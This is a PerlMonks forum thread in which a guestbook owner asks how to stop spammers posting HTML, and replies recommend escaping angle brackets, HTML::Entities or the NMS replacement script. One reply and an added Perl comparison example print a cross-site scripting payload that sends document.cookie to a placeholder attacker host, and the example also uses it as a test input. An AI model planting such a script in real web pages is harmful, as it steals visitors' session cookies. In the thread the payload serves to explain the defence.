PerlMonks  

Emergency! Our guestbook is getting trashed by HTML!

by JCHallgren (Sexton)
on Dec 17, 2004 at 15:04 UTC [id://415651]

JCHallgren has asked for the wisdom of the Perl Monks concerning the following question:

TOTAL NEWBIE here! I am NOT a programmer in Perl and don't wish to be... however, I belong to a chatroom that uses common freeware code... we are having a problem with spammers posting HTML comments "" that knock out OUR post entries... I am trying to assist the owner of the list with the problem... will setting "$allow_html to 0" block HTML code from being entered? I see that it does something, but have NO clue as to what... I would LOVE to set the value of the "comments" field to SPACES upon detection of ANY HTML code in it so that it would fall into the blank comments error routine and thus block that entry! How could I do so??? THANKS!! This is the section of code from the original GUESTBOOK from Matt's Script Archive that I need HELP with:
    foreach $pair (@pairs) {
        ($name, $value) = split(/=/, $pair);

        # Un-Webify plus signs and %-encoding
        $value =~ tr/+/ /;
        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $value =~ s/<!--(.|\n)*-->//g;

        if ($allow_html != 1) {
            $value =~ s/<([^>]|\n)*>//g;
        }

        $FORM{$name} = $value;
    }

    # Print the Blank Response Subroutines
    &no_comments unless $FORM{'comments'};
    &no_name unless $FORM{'realname'};

Re: Emergency! Our guestbook is getting trashed by HTML!
by ikegami (Patriarch) on Dec 17, 2004 at 15:21 UTC

    Setting $allow_html to 0 will *attempt* to remove HTML. It will fail if the person supplies a < without a matching >. Fixing it would be convoluted. It's easier to just escape < and >:

        if ($allow_html != 1) {
            $value =~ s/</&lt;/g;
            $value =~ s/>/&gt;/g;
        }

    Better yet, have a look at secure versions of Matt's scripts.

      This or something similar should be in any code that re-displays user-entered input. HTML::Entities can do a very good job with this. While an unclosed <H1> may be inconvenient, this can be even worse:

          <script> document.location='http://nasty.site/cgi-bin/cookie.cgi?'%20+document.cookie </script>

      Take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft for information on why this can be "very bad".

      In short: never display uncooked user input in a web page unless you have a very good reason to.

        Yah, you should look at http://www.shocking.com/~rsnake/xss.html There are a lot of risks there, it seems.
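The three approaches discussed in this sub-thread side by side, as an added example that is not code from the thread or from Matt's Script Archive: the MSA tag-stripping regex quoted in the question, ikegami's "escape instead of strip" done with HTML::Entities, and the blank-the-field-on-any-HTML check the original poster asked for. The sample inputs are constructed; the `parse_form` drop-in and the "any `<` or `>` counts as HTML" rule are assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example, not code from the thread or from Matt's Script Archive.
# Compares the MSA tag-stripping regex quoted in the question with
# ikegami's "escape instead of strip" and with the blank-on-HTML check
# the original poster asked for. All sample inputs below are constructed.
use strict;
use warnings;
use HTML::Entities qw(encode_entities);

# What "$allow_html != 1" does in the MSA loop: try to delete tags.
sub msa_strip {
    my ($value) = @_;
    $value =~ s/<!--(.|\n)*-->//g;    # MSA comment strip (greedy)
    $value =~ s/<([^>]|\n)*>//g;      # MSA tag strip: only fires with a matching '>'
    return $value;
}

# ikegami's approach via HTML::Entities: neutralise the markup characters.
# '&' and '"' are escaped too, so the value is also safe inside an attribute.
sub escape_for_html {
    my ($value) = @_;
    return encode_entities($value, '<>&"');
}

# What the OP asked for: blank the field if it looks like it contains HTML,
# so the existing "&no_comments unless $FORM{'comments'}" check rejects the
# post. Treating any '<' or '>' as HTML is an assumption made here.
# In the MSA loop this would sit just before "$FORM{$name} = $value;" as
#     $value = blank_if_html($value) if $name eq 'comments';
sub blank_if_html {
    my ($value) = @_;
    return $value =~ /[<>]/ ? '' : $value;
}

# Hypothetical drop-in for the MSA decode loop, escaping AFTER %-decoding:
# "%3C" only becomes '<' once decoded, so escaping earlier would miss it.
sub parse_form {
    my ($query, $allow_html) = @_;
    my %form;
    for my $pair (split /&/, $query) {
        my ($name, $value) = split /=/, $pair, 2;
        $value = '' unless defined $value;
        $value =~ tr/+/ /;
        $value =~ s/%([a-fA-F0-9]{2})/pack("C", hex($1))/eg;
        $value = escape_for_html($value) unless $allow_html;
        $form{$name} = $value;
    }
    return \%form;
}

# Constructed inputs: a normal entry, the cookie-theft payload from the
# thread, and the case ikegami warns about (a '<' with no closing '>').
my %sample = (
    'closed tag'   => 'nice <b>chat</b> room',
    'script'       => q{<script>document.location='http://nasty.site/cgi-bin/cookie.cgi?'+document.cookie</script>},
    'unclosed tag' => 'hello <script src=http://nasty.site/x.js',
);

for my $label (sort keys %sample) {
    my $in = $sample{$label};
    printf "%-13s input : %s\n", $label, $in;
    printf "%-13s strip : %s\n", '',     msa_strip($in);
    printf "%-13s escape: %s\n", '',     escape_for_html($in);
    printf "%-13s blank : [%s]\n", '',   blank_if_html($in);
    print "\n";
}

# The same payload arriving %-encoded, run through the decode-then-escape loop.
my $form = parse_form('realname=Bob&comments=%3Cscript%3Ealert%281%29%3C%2Fscript%3E', 0);
print "comments stored as: $form->{comments}\n";
```

The "unclosed tag" row is the failure ikegami describes: `msa_strip` returns it untouched because the regex needs a `>` to match, so the `<script src=...` lands in the page and the browser closes the tag with whatever `>` comes next in the guestbook's own markup. Escaping has no such edge case, because every `<` is rewritten regardless of what follows it; the OP's blank-on-HTML rule is cruder but also has none, at the cost of rejecting harmless entries that merely mention a less-than sign.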
Re: Emergency! Our guestbook is getting trashed by HTML!
by Ovid (Cardinal) on Dec 17, 2004 at 16:01 UTC
Re: Emergency! Our guestbook is getting trashed by HTML!
by gellyfish (Monsignor) on Dec 17, 2004 at 16:03 UTC

    The NMS guestbook can be used as a direct replacement to the one from Matts Script Archive and implements HTML filtering on the contents of the posts. It is probably easiest to simply replace the program than fix the MSA guestbook.

    /J\

      I am EXTREMELY grateful for ALL the replies!! THANKS a MILLION! Some spammers have apparently decided to blast a number of "guestbook" boards around the Net... found exactly the same junk entries on three other ones via a Google of the junk email address used!
Re: Emergency! Our guestbook is getting trashed by HTML!
by DrHyde (Prior) on Dec 20, 2004 at 09:29 UTC
    TOTAL NEWBIE here! I am NOT a programmer in Perl and don't wish to be.

    Then you're in the wrong place. It seems that you want people to solve your problem but you're not willing to work with them on this. That, to me, indicates that you should be paying someone. Additionally, if you put "matt's script archive guestbook perl" into our friend Google, it comes back with the solution that others here have recommended *as the very first result*.

      I simply meant that I wished to either get a quickie one/two-line fix to the existing code -or- a pointer to newer/better code... which I got... THANKS... and I HAD searched via Google for an hour or so... but NEVER found the NMS scripts... maybe I used the wrong query... did not use that exact phrasing... what I DID find was this forum! I also do not have ready access to a library/bookstore here, which I would have tried also before posting... FYI: I have been a COBOL programmer for 23+ years, so programming is not totally foreign to me... also did Z-80 assembler years ago for "fun"... however, at this time, I needed a simple answer... so looked here, OK?
